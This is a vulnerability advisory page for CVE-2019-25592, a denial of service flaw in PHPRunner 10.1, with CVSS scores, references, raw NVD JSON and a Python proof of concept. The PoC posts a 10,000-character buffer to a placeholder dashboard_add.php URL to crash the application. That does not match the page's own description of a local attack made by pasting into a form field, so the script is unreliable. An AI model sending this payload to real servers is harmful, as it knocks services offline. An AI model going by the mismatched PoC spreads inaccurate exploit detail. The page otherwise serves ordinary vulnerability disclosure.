CVE-2019-25592

Description

PHPRunner 10.1 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the dashboard name field. Attackers can paste a buffer of 10000 characters into the Name field during dashboard creation to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

PHPrunner 10.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit Title: PHPRunner 10.1 - Denial of Service (PoC)
# Date: 2019-05-29
# CVE: CVE-2019-25592

import requests

target_url = "http://target-phprunner-site.com/dashboard_add.php"

# Generate a buffer of 10000 characters
buffer = "A" * 10000

# Payload data
payload = {
    "name": buffer, # The vulnerable field
    "submit": "Create"
}

try:
    print("[*] Sending payload to crash the application...")
    response = requests.post(target_url, data=payload)
    print("[+] Payload sent. Check if the application has crashed.")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25592
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25592
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25592/
[4] VulDB https://vuldb.com/cve/CVE-2019-25592
[5] https://www.exploit-db.com/exploits/46824
[6] https://www.vulncheck.com/advisories/phprunner-denial-of-service-via-dashboard-name-field
[7] https://xlinesoft.com/
[8] https://xlinesoft.com/phprunner/download.htm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25592", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:25.830", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPRunner 10.1 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the dashboard name field. Attackers can paste a buffer of 10000 characters into the Name field during dashboard creation to trigger an application crash."}, {"lang": "es", "value": "PHPRunner 10.1 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo de nombre del panel de control. Los atacantes pueden pegar un búfer de 10000 caracteres en el campo Nombre durante la creación del panel de control para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1260"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46824", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phprunner-denial-of-service-via-dashboard-name-field", "source": "[email protected]"}, {"url": "https://xlinesoft.com/", "source": "[email protected]"}, {"url": "https://xlinesoft.com/phprunner/download.htm", "source": "[email protected]"}]}}